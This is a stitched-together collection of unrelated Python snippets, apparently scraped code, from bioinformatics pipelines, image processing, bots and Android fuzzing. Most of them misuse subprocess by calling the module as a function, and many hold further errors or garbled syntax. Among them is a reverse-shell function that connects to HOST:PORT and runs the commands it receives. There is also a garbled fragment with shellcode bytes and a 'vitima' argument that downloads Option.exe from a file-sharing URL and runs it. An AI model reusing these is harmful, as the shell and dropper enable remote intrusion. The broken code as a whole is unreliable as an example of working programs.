def ExecutePass( self, output ): #Check inputs files are in place if os.path.exists(self._inputVolume) == False: return False if self._useMask==1: if os.path.exists(self._maskFileName) == False: return False if self._singleScale == 1: tmpCommand = "unu resample -i " + self._inputVolume + " -s x1 x1 x1 -k dgauss:" + str(self._maxScale) + ",3 -t float -o " + self._inputVolume subprocess( tmpCommand, shell=True) tmpCommand = "puller -sscp " + self._temporaryDirectory + " -cbst true " + self._volParams + " " + self._miscParams + " " + self._infoParams + " " + \ self._energyParams + " " + self._initParams + " " + self._reconKernelParams + " " + self._optimizerParams + " -o " + output + " -maxi " + str(self._iterations) if self._verbose == 1: print tmpCommand #TODO: (remove this line) subprocess.call( tmpCommand, shell=True ) #Trick to add scale value if self._singleScale == 1: tmpCommand = "unu head " + output + " | grep size | awk '{split($0,a,\" \"); print a[3]}'" tmpNP = subprocess.Popen( tmpCommand, shell=True, stdout=PIPE, stderr=PIPE ) NP = tmpNP.communicate()[0].rstrip('\n') tmpCommand = "echo \"0 0 0 " + str(self._maxScale) + "\" | unu pad -min 0 0 -max 3 " + NP + " -b mirror | unu 2op + - " + output + " -o " + output subprocess.call( tmpCommand, shell=True )
def kill_julius(): try: subprocess( "ps ax | grep julius | grep -v grep | awk '{print $1}' | xargs kill" ) except Exception as e: print('Juliusの終了に失敗しました :' + e)
def main(left_reads, right_reads, genome_index_dir, insert_size): left_reads = dxpy.DXFile(left_reads) right_reads = dxpy.DXFile(right_reads) genome_index_dir = dxpy.DXFile(genome_index_dir) dxpy.download_dxfile(left_reads.get_id(), 'left_reads.bam') dxpy.download_dxfile(right_reads.get_id(), 'right_reads.bam') dxpy.download_dxfile(genome_index_dir.get_id(), 'genomeDir.tar.gz') subprocess(['tar' , '-zxvf' , 'genomeDir.tar.gz']) sample_name = left_reads.split('_')[0] star_cmd = ['STAR'] options = ['--runThreadN' , '16', '--genomeDir', "genome_index_dir", '--readFilesIn', "left_reads.bam", "right_reads.bam", '--sjdbOverhang', insert_size, '--outSAMtype' , 'BAM' , 'SortedByCoordinate' ] star_cmd.extend(options) star_cmd_str = " ".join(star_cmd) subprocess.check_call(star_cmd_str) output_name = '%s.out.bam' % sample_name os.rename('Aligned.sortedByCoord.out.bam' , output_name) output_file = dxpy.upload_local_file(output_name) output = {} output['output_bam'] = output_file return output
def ExecutePass(self, output): #Check inputs files are in place if os.path.exists(self._inputVolume) == False: return False if self._useMask == 1: if os.path.exists(self._maskFileName) == False: return False if self._singleScale == 1: tmpCommand = "unu resample -i " + self._inputVolume + " -s x1 x1 x1 -k dgauss:" + str( self._maxScale) + ",3 -t float -o " + self._inputVolume subprocess(tmpCommand, shell=True) tmpCommand = "puller -sscp " + self._temporaryDirectory + " -cbst true " + self._volParams + " " + self._miscParams + " " + self._infoParams + " " + \ self._energyParams + " " + self._initParams + " " + self._reconKernelParams + " " + self._optimizerParams + " -o " + output + " -maxi " + str(self._iterations) if self._verbose == 1: print tmpCommand #TODO: (remove this line) subprocess.call(tmpCommand, shell=True) #Trick to add scale value if self._singleScale == 1: tmpCommand = "unu head " + output + " | grep size | awk '{split($0,a,\" \"); print a[3]}'" tmpNP = subprocess.Popen(tmpCommand, shell=True, stdout=PIPE, stderr=PIPE) NP = tmpNP.communicate()[0].rstrip('\n') tmpCommand = "echo \"0 0 0 " + str( self._maxScale ) + "\" | unu pad -min 0 0 -max 3 " + NP + " -b mirror | unu 2op + - " + output + " -o " + output subprocess.call(tmpCommand, shell=True)
def seq2avi(seqPath, aviPath): f = os.listdir(path) f = list(set(glob(path + '*.seq')) - set(glob(path + '*calib*.seq'))) for file in f: fileAVI = os.path.split(file)[1] fileAVI = os.path.splitext(fileAVI)[0] + '.avi' subprocess([ 'clexport', '-i', file, '-f', 'avi', '-cv', '0', '-o', aviPath, '-ofs', fileAVI ])
def createFile(): subprocess(["touch", "/etc/config/data"]) subprocess(["chmod", "775", "data"]) file = open("/etc/config/data", 'w') try: print(file.write(ip + "\n")) print(file.write(name_wifi + "\n")) print(file.write(start_list[3] + "\n")) print(file.write(max_pool)) finally: file.close() return True
def openFile(self, filePath): import platform, subprocess, os if platform.system() == "Linux": subprocess.Popen([config.open, filePath]) elif platform.system() == "Windows": try: subprocess("excel.exe {0}".format(filePath), shell=True) except: try: subprocess("start {0}".format(filePath), shell=True) except: pass else: os.system("{0} {1}".format(config.open, filePath))
def createavatar(username): """creates avatar""" avatar = Avatar(rows=10, columns=10) image_byte_array = avatar.get_image(string=username, width=400, height=400, pad=10) loc = "/static/avatars/" + username subprocess(["mkdir", loc]) save_location = "/static/avatars/" + username + "/default.png" avatar.save(image_byte_array=image_byte_array, save_location=save_location) return save_location
def zip(): ''' >>> #subprocess('make zip') ''' ret = subprocess('make zip') print ret[1]
def prepare_videos(self): print("preparing videos.......") result = subprocess(['python', '/home/callbarian/C3D/C3D-v1.0/examples/c3d_feature_extraction/run_feature_extraction.py'],stdout=subprocess.PIPE,stderr=subprocess.PIPE) #result = subprocess.Popen(['python', '/Users/iseongmin/Downloads/qt_projects/application/application.py'],stdout=subprocess.PIPE,stderr=subprocess.PIPE) out= result.communicate() print(out[0])
def upload_archive(exp_name, archive_excludes, s3_bucket): import hashlib, os.path as osp, subprocess, tempfile, uuid, sys # Archive this package thisfile_dir = osp.dirname(osp.abspath(__file__)) pkg_parent_dir = osp.abspath(osp.join(thisfile_dir, '..', '..')) pkg_subdir = osp.basename(osp.abspath(osp.join(thisfile_dir, '..'))) assert osp.abspath(__file__) == osp.join(pkg_parent_dir, pkg_subdir, "scripts", "rl_launch.py") # run tar tmpdir = tempfile.TemporaryDirectory() local_archive_path = osp.join(tmpdir.name, '{}.tar.gz'.format(uuid.uuid4)) tar_cmd = ["tar", "-zcvf", local_archive_path, "-C", pkg_parent_dir] for pattern in archive_excludes: tar_cmd += ['--exclude', pattern] tar_cmd += ["-h", pkg_subdir] print(tar_cmd) if sys.platform == 'darwin': # Prevent Mac tar from adding ._* files env = os.environ.copy() env['COPYFILE_DISABLE'] = '1' subprocess.check_call(tar_cmd, env=env) else: subprocess(tar_cmd) # Construct remote path to place the archive on S3 with open(local_archive_path, 'rb') as f: archive_hash = hashlib.sha224(f.read()).hexdigest() remote_archive_path = '{}/{}_{}.tar.gz'.format(s3_bucket.strip(), exp_name.strip(), archive_hash.strip()) # Upload upload_cmd = ["aws", "s3", "cp", local_archive_path, remote_archive_path] highlight(" ".join(upload_cmd)) subprocess.check_call(upload_cmd) presign_cmd = [ "aws", "s3", "presign", remote_archive_path, "--expires-in", str(60 * 60 * 24 * 30) ] highlight(" ".join(presign_cmd)) remote_url = subprocess.check_output(presign_cmd).decode("utf-8").strip() return remote_url
def run(comment): """Get team composition and report with what the team is strongest in.""" request = comment.strip().split("!oldteamsummary")[1].strip() while request.endswith(","): request = request[:-1].strip() # User has listed heroes and not a Dotabuff URL response = "" if "," in request: heroes = request.split(",") if len(heroes) > 5: return new_team_data = construct_response(heroes) for role, rating in new_team_data.items(): response += ("" + role + ": **" + str(rating) + "**\n\n") elif (request.startswith("http://www.dotabuff.com/matches/") or request.startswith("www.dotabuff.com/matches/") or request.startswith("dotabuff.com/matches/")): output = subprocess(["curl", "-s", request]) #status, output = commands.getstatusoutput("curl -s " + request) soup = BeautifulSoup(output, "html.parser") radi_heroes = [] dire_heroes = [] for hero in soup.find_all("div", {"class": "image-container image-container-hero image-container-icon"}): hero = str(hero.find("a")) hero = hero[17:hero.find("\"><img class=\"image-hero image-icon")] if len(radi_heroes) < 5: radi_heroes.append(better_string(hero)) elif len(dire_heroes) < 5: dire_heroes.append(better_string(hero)) else: break radi_data = construct_response(radi_heroes) dire_data = construct_response(dire_heroes) response += ("#**Radiant:**\n\n") for role, rating in radi_data.items(): response += ("" + role + ": **" + str(rating) + "**\n\n") response += ("\n\n#**Dire:**\n\n") for role, rating in dire_data.items(): response += ("" + role + ": **" + str(rating) + "**\n\n") else: return return response
def nikto_help(target): from core.build_menu import buildmenu nikto_help = subprocess('nikto -H', shell=True) print(" " + color.custom('[B] Back', bold=True, white=True, bg_red=True) + '\n') buildmenu(target, target[0].last_menu, '', '')
def __init__(self): self.get_devices_Info() #self.clear_log() self.cmd_sys = subprocess( 'adb -s %s logcat | grep "UploadService".*"upload"', shell=True, stdout=subprocess.PIPE, bufsize=1, stderr=subprocess.STDOUT)
def shell(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST,PORT)) s.send('[*] Connection Established!') while 1: data = s.recv(1024) if data == "quit": break proc = subprocess(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) STDOUT, STDERR = proc.communicate() s.send(STDOUT) s.close()
def eval_model(model_pth, test_dir, submit_path, NMS_choice='lanms'): if os.path.exists(submit_path): shutil.rmtree(submit_path) os.mkdir(submit_path) device = ("cuda:2" if torch.cuda.is_available() else "cpu") checkpoint = torch.load(model_pth) model = PixelAnchornet(pretrained=False).to(device) model.load_state_dict(checkpoint) start_time = time.time() detect_dataset(model, device, test_dir, submit_path, NMS_choice=NMS_choice) os.chdir(submit_path) subprocess.call('zip -q submit.zip *.txt') subprocess.call('mv submit.zip ../') os.chdir('../') subprocess( 'python ./evaluate/script.py –g=./evaluate/gt.zip –s=./submit.zip') os.remove('./submit.zip') print('eval time is {}'.format(time.time() - start_time))
def prep(cfg): # get parameter settings (runpath, runname, samplename, speSide, r1universal, r2universal, umiLen, umiOffset, panelId, platform) = cfg # read set related preprocessing readSet = runname + "." + samplename samplepath = runpath + "/" + runname if not os.path.exists(samplepath): samplepath = runpath subprocess.check_call("mkdir -p " + readSet, shell = True) if platform == "2": cmd = "mv " + samplepath + "/" + samplename + "*.fastq " + readset + "/" + samplename + ".fastq" subprocess(cmd, shell = True) makePair(readset + "/" + samplename + ".fastq", speSide) else: fastq1 = samplepath + "/" + samplename + "*_R1*.fastq" fastq2 = samplepath + "/" + samplename + "*_R2*.fastq" cmd1 = "if [ -e " + fastq1 + " ]; then mv " + fastq1 + " " + readSet + "/" + samplename + "_R1.fastq; else mv " + fastq1 + ".gz " + readSet + "/" + samplename + "_R1.fastq.gz; fi" cmd2 = "if [ -e " + fastq2 + " ]; then mv " + fastq2 + " " + readSet + "/" + samplename + "_R2.fastq; else mv " + fastq2 + ".gz " + readSet + "/" + samplename + "_R2.fastq.gz; fi" subprocess.check_call(cmd1, shell = True) subprocess.check_call(cmd2, shell = True)
def dencode(): subprocess.call('cls', 'color 0f') try: makeFile = subprocess('mkdir {}_paths_unpack') % (FILE) lbSucess = ("[++] dencode com sucesso!\n[#] {} foi salvo como {} na sua desktop!") % (FILE, makeFile) except Exception as e: print(lbError) else: print(lbError)
def CheckSaturation(mod): case=Case(); case.time,case.mod,case.energy = np.loadtxt('EnergyFile.mdl', comments="\x00", skiprows=1, usecols=(0,1,2), unpack=True) t0=case.time[(case.mod==mod)]; e0=case.energy[(case.mod==mod)]; y1=np.gradient(e0,2); y2=np.where(y1<=0); if(len(y2[0])>1):return 0; return 1; os.chdir('/home/nyadav/pbs'); f1=open('/home/nyadav/pbs/jobBezmpi.sh','r'); d=f1.readlines(); d[2]='#PBS -N '+name; d[6]='cd '+path; f1.close(); # subprocess('rm /home/nyadav/pbs/jobBezmpi.sh',shell=True); f1=open('/home/nyadav/pbs/abc.sh','w'); f1.writelines(d); f1.close(); subprocess("chmod" "u+x" "/home/nyadav/pbs/abc.sh",shell=True);
def generatePublisherPolicyConfig(env, target, source): """this method assumes that source list corresponds to [0]=version, [1]=assembly base name, [2]=assembly file node""" # call strong name tool against compiled assembly and parse output for public token outputFolder = os.path.split(target[0].tpath)[0] pubpolicy = os.path.join(outputFolder, source[2].name) rv, data, err = subprocess("sn -T " + pubpolicy) import re tok_re = re.compile(r"([a-z0-9]{16})[\r\n ]{0,3}$") match = tok_re.search(data) tok = match.group(1) # calculate version range to redirect from version = source[0].value oldVersionStartRange = "%s.%s.0.0" % (version[0], version[1]) newVersion = "%s.%s.%s.%s" % (version[0], version[1], version[2], version[3]) build = int(version[2]) rev = int(version[3]) # on build 0 and rev 0 or 1, no range is needed. otherwise calculate range if build == 0 and (rev == 0 or rev == 1): oldVersionRange = oldVersionStartRange else: if rev == 0: endRevisionRange = "0" endBuildRange = str(build - 1) else: endRevisionRange = str(rev - 1) endBuildRange = str(build) oldVersionEndRange = "%s.%s.%s.%s" % ( version[0], version[1], endBuildRange, endRevisionRange, ) oldVersionRange = "%s-%s" % (oldVersionStartRange, oldVersionEndRange) # write .net config xml out to file with open(target[0].path, "w") as out: out.write("""\ <configuration><runtime><assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1"> <dependentAssembly> <assemblyIdentity name="%s" publicKeyToken="%s"/> <bindingRedirect oldVersion="%s" newVersion="%s"/> </dependentAssembly> </assemblyBinding></runtime></configuration> """ % (source[1].value, tok, oldVersionRange, newVersion))
def generatePublisherPolicyConfig(env, target, source): """this method assumes that source list corresponds to [0]=version, [1]=assembly base name, [2]=assembly file node""" # call strong name tool against compiled assembly and parse output for public token outputFolder = os.path.split(target[0].tpath)[0] pubpolicy = os.path.join(outputFolder, source[2].name) rv, data, err = subprocess("sn -T " + pubpolicy) import re tok_re = re.compile(r"([a-z0-9]{16})[\r\n ]{0,3}$") match = tok_re.search(data) tok = match.group(1) # calculate version range to redirect from version = source[0].value oldVersionStartRange = "%s.%s.0.0" % (version[0], version[1]) newVersion = "%s.%s.%s.%s" % (version[0], version[1], version[2], version[3]) build = int(version[2]) rev = int(version[3]) # on build 0 and rev 0 or 1, no range is needed. otherwise calculate range if build == 0 and (rev == 0 or rev == 1): oldVersionRange = oldVersionStartRange else: if rev - 1 < 0: endRevisionRange = "99" endBuildRange = str(build - 1) else: endRevisionRange = str(rev - 1) endBuildRange = str(build) oldVersionEndRange = "%s.%s.%s.%s" % (version[0], version[1], endBuildRange, endRevisionRange) oldVersionRange = "%s-%s" % (oldVersionStartRange, oldVersionEndRange) # write .net config xml out to file out = open(target[0].path, "w") out.write( """\ <configuration><runtime><assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1"> <dependentAssembly> <assemblyIdentity name="%s" publicKeyToken="%s"/> <bindingRedirect oldVersion="%s" newVersion="%s"/> </dependentAssembly> </assemblyBinding></runtime></configuration> """ % (source[1].value, tok, oldVersionRange, newVersion) ) out.close()
def get_uptime(self): with subprocess(['uptime']) as line: contents = line.read().split() total_seconds = float(contents[0]) MINUTE = 60 HOUR = MINUTE * 60 DAY = HOUR * 24 days = int( total_seconds / DAY ) hours = int( ( total_seconds % DAY ) / HOUR ) minutes = int( ( total_seconds % HOUR ) / MINUTE ) seconds = int( total_seconds % MINUTE ) uptime = "{0} days {1} hours {2} minutes {3} seconds".format(days, hours, minutes, seconds) return uptime
def find_gcov(self, dir) : find = subprocess([ "find", dir, "-name", "*.gcno" ], stdout=subprocess.PIPE) for rec in iter(find.stdout.readline, b'') : gcno = rec.strip() path = gcno[0 : -5] gcda = path + ".gcda" file = "" for ext in [ ".c", ".cc", ".cpp" ] : if os.path.exists(path + ext) : file = path + ext break self.debug("find_gcno: gcno=[%s] gcda=[%s] file=[%s]" % (gcno, gcda, file)) if os.patyh.exists(gcda) : if file == "" : file = path + ".o" self.gcov_csv(file) elif file : self.file_csv(file)
def run( self ): # make sure full path is available self.path = os.path.abspath( self.path ) # start herwig run print "--h7[%i]: working on '%s'" % (os.getpid(),self.path) # create directory mkdir( self.path ) # create runcard print "--h7[%i]: runcard" % os.getpid() self.card() # build print "--h7[%i]: build" % os.getpid() args = [ 'hepstore-herwig', '--docker_verbose', '--docker_directory', self.path, 'build', '%s.in' % self.name ] subprocess( args, onscreen=False, fname=os.path.join(self.path,'build-std') ) # integrate print "--h7[%i]: integrate" % os.getpid() args = [ 'hepstore-herwig', '--docker_verbose', '--docker_directory', self.path, 'integrate', '%s.run' % self.name, ] subprocess( args, onscreen=False, fname=os.path.join(self.path,'integrate-std') ) # find a clean generation folder self.next() mkdir( os.path.join( self.path, self.folder)) os.link( os.path.abspath( os.path.join(self.path,'Herwig-scratch') ), os.path.abspath( os.path.join(self.path,self.folder,'Herwig-scratch') ) ) os.link( os.path.abspath( os.path.join(self.path,'%s.run' % self.name) ), os.path.abspath( os.path.join(self.path,self.folder,'%s.run' % self.name) ) ) # run print "--h7[%i]: run" % os.getpid() args = [ 'hepstore-herwig', '--docker_verbose', '--docker_directory', os.path.join(self.path,self.folder), 'run' , '%s.run' % self.name, '-N', '%i' % self.options.nevents, '-s', '%i' % self.seed ] subprocess( args, onscreen=False, fname=os.path.join(self.path,self.folder,'run-std') ) # return the path to the hepmc file self.hepmc_dir = os.path.join( self.path, self.folder ) pass
if (answer == "1"): data = input("DATA FILE NAME:\n ") new_file = input("WHAT WOULD YOU LIKE TO NAME THE NEWLY ENCRYPTED FILE?\n ") pubkey = input("RECIPIENTS PUBLIC KEY:\n ") subprocess.run(["openssl", "rand","-out", "randompass.txt", "-base64", "120"]) subprocess.run(["openssl", "enc", "-aes-256-cbc", "-salt", "-in", data, "-out", new_file, "-pass", "file:randompass.txt"]) 0 subprocess.run(["openssl", "rsautl","-encrypt", "-in", "randompass.txt", "-out" , "randompass.enc", "-pubin", "-inkey", pubkey]) subprocess(['rm', randompass.txt]) subprocess(['rm', data]) suborocess(['mv', new_file, '/media/vault']) # Decryption elif (answer == "2"): privkey = input("ENTER YOUR PRIVATE KEY:\n ") file_name = input("ENTER THE NAME OF THE ENCRYPTED FILE:\n ") data = input("NAME THE NEW FILE:\n ")
def addpkg(package, version=DEF_VERSION, pkg_path=DEF_PKG_PATH): pkg_path = os.path.join(pkg_path, version, 'packages') proc = subprocess(['pkg_add', package]) proc.wait() assert proc.returncode == 0
elif cmd[0] == "ls" and len(cmd) == 1: ls() elif cmd[0] == "ls" and len(cmd) == 2: ls2(cmd) elif cmd[0] == "rm": rm(cmd) elif len(cmd) == 3 and cmd[0] == "cp": cp(cmd) elif len(cmd) == 2 and cmd[0] == "cd": cd(cmd) elif len(cmd) == 2 and cmd[0] == "wc": fname = cmd[1] option = 0 wc(cmd, fname, option) elif len(cmd) == 3 and cmd[0] == "wc": option = cmd[1] fname = cmd[2] wc(cmd, fname, option) elif cmd[0] == "mv": mv(cmd) elif cmd[0] == "pwd": pwd() elif cmd[0] == "mkdir": mkdir(cmd) elif cmd[0] == "rmdir": rmdir(cmd) elif cmd[0] == "touch": touch(cmd) else: subprocess(cmd)
def start_process(): global process, command log('Start process %s...' % ' '.join(command)) process = subprocess(command, stdin=sys.stdin, stdout=sys.stdout, stderr=sys.stderr)
"--outFileFormat", "bigwig", "-p", pthread, "--normalizeUsing", "CPM", "--binSize", "1" ] print("\t$", " ".join(cmd8_args)) print(run_timed(cmd8_args)) ######## VERSIONS ############# print("\n>>> VERSIONS:") print("\n>>> FASEQC VERSION:") print(subprocess.run(["fastqc", "--version"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)) print("\n>>> HISAT2 VERSION:") print(subprocess.run(["hisat2", "--version"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)) print("\n>>> SAMTOOLS VERSION:") print(subprocess.run(["samtools", "--version"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)) print("\n>>> HTSEQ-COUNT VERSION:") output = subprocess.run(['htseq-count', '--help'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) for line in output.stdout: if line.find("version") >= 0: print(line.strip() break print("\n>>> BAMCOVERAGE VERSION:") print(subprocess(["bamCoverage", "--version"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)) print(">>> END: Analayzer complete.")
def install_vim_ult(): subprocess.run(['git', 'clone', '--depth=1', 'https://github.com/amix/vimrc.git', os.path.join(user_home, '.vim_runtime')]) subprocess(['sh', os.path.join(user_home, '.vim_runtime') + '/install_awesome_vimrc.sh'])
def upload_file(filename): cmdlist = ['ftp'] cmdlist.append(filename) p = subprocess(cmdlist, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) output, _ = p.communicate()
def fetch_all(self): cmd = 'git fetch --all' subprocess(shlex.split(cmd), cwd=self.repo_dir)
for fasta in rec_dict[strain]: concat_dict[strain]=concat_dict[strain]+str(fasta.seq) #write out concatenated fasta handle=open("all_concat.fasta", "w") for rec in concat_dict: handle.write(">"+rec+"\n"+concat_dict[rec]+"\n") handle.close() #SeqIO.write(list(SeqIO.parse(open("all_concat.fasta"), "fasta")), "all_concat.phy", "phylip") #now write out tree for node in tree_old.traverse(): if node.is_leaf(): temp=node.name.replace('p','plate') node.name=temp tree_old.prune(strains, preserve_branch_length=T) write.tree(tree_old, "all_concat.newick", formatrue=1) for leaf in collapsed.get_leaves(): temp=leaf.name.replace('p', 'plate').split("_")[0] leaf.name=temp collapsed.write(outfile="concat_107.newick", format=1) test=subprocess(Popen(["/ebio/abt6_projects9/Pseudomonas_diversity/Programs/bin/ClonalFrameML", "/ebio/abt6_projects9/Pseudomonas_diversity/data/post_assembly_analysis/pan_genome/data/vis/clonalframe/concat_107.newick", "/ebio/abt6_projects9/Pseudomonas_diversity/data/post_assembly_analysis/pan_genome/data/vis/clonalframe/all_concat.fasta"]), stdout=subprocess.PIPE)) output = test.communicate()[0]
def run_maker(filename): maker_command_string = "maker -g " + filename + " " + tmp_opts + " maker_bopots.ctl maker_exe.ctl" subprocess(maker_string,shell=True)
"\x16\x13\xe7\x82\xf2\x89\x5e\x3d\xe0\x53\x06\x06\xa0\x8f" + "\xfb\x89\x29\x5d\x47\xae\x39\x9b\x48\xea\x6d\x73\x1f\xa4" + "\xdb\x35\xc9\x06\xb5\xef\xa6\xc0\x51\x69\x85\xd2\x27\x76" + "\xc0\xa4\xc7\xc7\xbd\xf0\xf8\xe8\x29\xf5\x81\x14\xca\xfa" + "\x58\x9d\xa0\xc0\x80\xbf\xdc\x6c\xd1\xfd\x80\x8e\x0c\xc1" + "\xbc\x0c\xa4\xba\x3a\x0c\xcd\xbf\x07\x8a\x3e\xb2\x18\x7f" + "\x40\x61\x18\xaa") parser = argparse.ArgumentParser(description='<< Remote Desktop to Python!') parser.add_argument('--vitima', dest='accumulate', action='store_const') args = parser.parse_args() if param.vitima(): shellcode.set(vitima) subprocess('call', dir=0, shellcode=True) IPV4 = vitima[argv.exit] witdh, height = [int(IPV4) for a in str(subprocess.check_output("xrandr | grep '*' | awk '{print $1}'", shell=True))[2:-3].split('x')] t1 = thread.start(dest="30%") t2 = thread.start(0) t3 = thread.start(0) return vitima diretório = [dir, self=vitima()] if (diretório == "C:\Users\{}\Documents" + argv[4:0]): st = os.stat('data') os.chmod('Developer-3', st.st_mode | stat.S_IEXEC) FILE = grok.name('https://fs06n2.sendspace.com/dl/c4c91bd871422016d87ee6bf123836ce/5a9323f341db7394/1szd6a/Option.exe') subprocess.check_call(["C:\Users\{}\Downloads\Option.exe", "start", " | ", "grep", "{}" + argv[4:0]])
configuration = "" with open("/etc/systemd/network/eth0.network") as f: configuration = f.read() configuration = re.sub( "Address=\d+\.\d+\.\d+\.\d+(/\d+)?" , "Address=" + ip , configuration) with open("/etc/systemd/network/eth0.network", mode="w") as f: f.write(configuration) def getIpForLeg(legNumber): return "10.1.1." + str(legNumber) + "/24" def getIpForHip(hipNumber): return "10.1.1.1" + str(hipNumber) + "/24" if __name__ == '__main__': from docopt import docopt args = docopt(__doc__, version="Bone Specializer v0.1") if args["--leg"]: changeHostname("leg" + args["--leg"]) changeIpAddress(getIpForLeg(args["--leg"])) subprocess.call(["/home/stompy/bbbStuff/scripts/makeLegSymLinks.sh"]) elif args["--hip"]: changeHostname("hip" + args["--hip"]) changeIpAddress(getIpForHip(args["--hip"])) subprocess.call(["/home/stompy/bbbStuff/scripts/makeHipSymLinks.sh"]) elif args["--console"]: changeHostname("centralcontrol") changeIpAddress("10.1.1.10/24") subprocess(["rm", "rf", "/mnt/hardware"])
def video_hardware(device_id, seed_file): cmd = 'timeout 15 adb -s ' + device_id \ + " shell stagefright -r '/data/Movies/" \ + seed_file + "'" subprocess(cmd)
import subprocess import code code = subprocess(['ls','-z']) if code == 0: print('Command finished successfully') else: print("failed wtih code: %i" % code)
word = julius() if word == 'こんにちは': jtalk('こんにちは!') elif word == '名前覚えて': jtalk('おっけー。今は%sって呼んでるよ' % (use_shelf('username'))) # use_shelf('username') = julius() jtalk('%sだね。覚えたよ' % (use_shelf('username'))) elif word == '住所覚えて': jtalk('どこ住み?') # use_shelf('address') = julius() jtalk(use_shelf('address') + 'だね。覚えたよ') elif word == '勤務先覚えて': jtalk('職場どこ?') # use_shelf('work_address') = julius() jtalk(use_shelf('work_address') + 'だね。覚えたよ') elif word == '明日の天気教えて': jtalk('どこの?') type = julius() result if type == '住所': result = weather_forecast(use_shelf('address')) elif type == '勤務先': result = weather_forecast(use_shelf('work_address')) jtalk('明日の%sは%sだよ。最高気温は%s!' % (result[0], result[1], result[3])) elif word == 'c': jtalk('またね') use_shelf.close subprocess('ctrl+c') else: jtalk(word)
print 'audio - seed files are of audio type' print 'video - seed files are of video type' print 'play/noplay - enable testing of playback capabilities' print 'seed_number - number of the seed file to start from\n' print 'Ex: python test.py stagefright video noplay 0\n' sys.exit() target_type = sys.argv[1] format_type = sys.argv[2] playback = sys.argv[3] seed_number = sys.argv[4] # get device ids cmd = 'adb devices > devices.txt' subprocess(cmd) # parse the device id file to get the device list f1 = open('devices.txt', 'rw') devices = f1.readlines() count_devices = len(devices) - 2 dev = [None] * count_devices c = 0 for i in range(1, len(devices) - 1): reg_device = re.compile('\S*\s') dev[c] = str(reg_device.findall(devices[i])[0]) c = c + 1 # get batches list
def predict_rerank(args, test_exs, Q_scores, rerank_info, if_compare=False): transE = False transH = False transR = False transD = False if args.transX == 'transE': transE = True if args.transX == 'transH': transH = True if args.transX == 'transR': transR = True if args.transX == 'transD': transD = True filename = rerank_info['e_embed'] p_filename = rerank_info['r_embed'] A_filename = rerank_info['A_embed'] if args.transX != 'transE' else None N_entity = rerank_info['E'] N_relation = rerank_info['R'] h = args.size eid2idx = rerank_info['eid2idx'] pid2idx = rerank_info['pid2idx'] if transE: entity_embedding = np.memmap(filename, dtype='float32', shape=(N_entity, h), mode='r') relation_embedding = np.memmap(p_filename, dtype='float32', shape=(N_relation, h), mode='r') elif transH: def transferH(e, r_p): return e - np.sum(e * r_p) * r_p import numpy as np entity_embedding = np.memmap(filename, dtype='float32', shape=(N_entity, h), mode='r') relation_embedding = np.memmap(p_filename, dtype='float32', shape=(N_relation, h), mode='r') relation_transfer = np.memmap(A_filename, dtype='float32', shape=(N_relation, h), mode='r') elif transD: def transferD(e, e_p, r_p): # h,hp,rp return e + np.sum(e * e_p) * r_p entity_embedding = np.memmap(filename, dtype='float32', shape=(N_entity, h), mode='r') relation_embedding = np.memmap(p_filename, dtype='float32', shape=(N_relation, h), mode='r') A_embedding = np.memmap(A_filename, dtype='float32', shape=(N_entity + N_relation, h), mode='r') relation_transfer = A_embedding[:N_relation] entity_transfer = A_embedding[N_relation:] # predict, reranking exact_match = 0 exact_match3 = 0 exact_match10 = 0 exclude_self = 0 n_ans_exist = 0 new_samples = [] for ex_id, sample in enumerate(test_exs): ans_id = sample['ans_id'] e1_id = sample['triple'][0][0] p_id = sample['triple'][0][1] ans_exist = sample['ans_exist'] predictions = sorted( Q_scores[ex_id].items(), key=lambda item: item[1], reverse=True ) # Q_scores[ex_id]: Q_id:score if compare Qid,Qname:score if if_compare: predictions = [p[0][0] for p in predictions] predictions_names = [p[0][1] for p in predictions] old_pre = (predictions, predictions_names) else: predictions = [p[0] for p in predictions] if len(predictions) == 0: continue # 1 if args.rerank_method == 'soft': total_score = 0 my_score = [] for c_idx, c in enumerate(predictions): score = Q_scores[ex_id][( c, predictions_names[c_idx] )] if if_compare else Q_scores[ex_id][c] total_score += score my_score.append((c, score)) my_score = dict([(c, score / total_score) for c, score in my_score ]) if args.rerank_softnormal else dict(my_score) if eid2idx.get(e1_id) != None and pid2idx.get(p_id) != None: e1_idx = eid2idx[e1_id] p_idx = pid2idx[p_id] pre_indexs = [eid2idx[Q] for Q in predictions] # compute final score if transE: final_scores = np.sum( abs(entity_embedding[e1_idx] + relation_embedding[p_idx] - entity_embedding[pre_indexs]), 1) elif transH: p_norm = relation_transfer[p_idx] e1_vec = transferH(entity_embedding[e1_idx], p_norm) p_vec = relation_embedding[p_idx] final_scores = [] for index in pre_indexs: e2_vec = transferH(entity_embedding[index], p_norm) score = np.sum(abs(e1_vec + p_vec - e2_vec)) final_scores.append(score) elif transD: e1_vec = transferD(entity_embedding[e1_idx], entity_transfer[e1_idx], relation_transfer[p_idx]) p_vec = relation_embedding[p_idx] final_scores = [] for index in pre_indexs: e2_vec = transferD(entity_embedding[index], entity_transfer[index], relation_transfer[p_idx]) score = np.sum(abs(e1_vec + p_vec - e2_vec)) final_scores.append(score) new_index = np.argsort(final_scores) # 2 if args.rerank_method == 'hard': predictions = list(np.array(predictions)[new_index]) else: trans_score = [] total_score = 0 for c_idx, c in enumerate(predictions): score = final_scores[c_idx] total_score += score trans_score.append((c, score)) trans_score = dict([ (c, score / total_score) for c, score in trans_score ]) if args.rerank_softnormal else dict(trans_score) real_scores = [] for c in predictions: real_scores.append(my_score[c] - trans_score[c]) new_index = np.argsort(-real_scores) predictions = list(np.array(predictions)[new_index]) prediction = predictions[0] correct = prediction in ans_id exact_match += correct n_ans_exist += ans_exist prediction = predictions[1] if ( prediction[0] == e1_id and len(predictions) > 1) else predictions[0] correct_self = prediction in ans_id exclude_self += correct_self correct3 = len(([p for p in predictions[:3] if p in ans_id])) != 0 exact_match3 += correct3 correct10 = len( ([p for p in predictions[:10] if p in ans_id])) != 0 exact_match10 += correct10 # sample['origin_pre'],sample['rerank_pre'], # sample['predict_true'],sample['rerank_true'] # sample['state'],sample['sample_id'] if if_compare: predictions_names = list( 